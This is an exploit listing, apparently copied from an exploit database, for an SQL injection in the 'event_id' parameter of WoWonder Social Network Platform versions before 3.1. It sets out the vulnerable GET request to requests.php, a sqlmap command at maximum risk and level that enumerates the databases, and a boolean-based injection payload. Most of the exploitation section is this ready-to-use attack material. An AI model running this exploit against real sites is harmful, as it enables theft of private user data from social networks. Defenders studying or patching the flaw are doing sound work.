Exploit for WoWonder Social Network Platform 3.1 SQL Injection

Name: Exploit for WoWonder Social Network Platform 3.1 SQL Injection
Rating: 5 (187 reviews)

2021-03-17 | CVSS -0.0

## https://sploitus.com/exploit?id=PACKETSTORM:161825
# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection  
# Date: 16.03.2021  
# Exploit Author: securityforeveryone.com  
# Author Mail: hello[AT]securityforeveryone.com  
# Vendor Homepage: https://www.wowonder.com/  
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302  
# Version: < 3.1  
# Tested on: Linux/Windows  
  
DESCRIPTION  
  
In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.  
  
The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.  
Example:  
/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID   
  
if an attacker exploits this vulnerability, attacker may access private data in the database system.  
  
EXPLOITATION  
  
# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1  
# Host: Target  
  
Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs  
  
Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF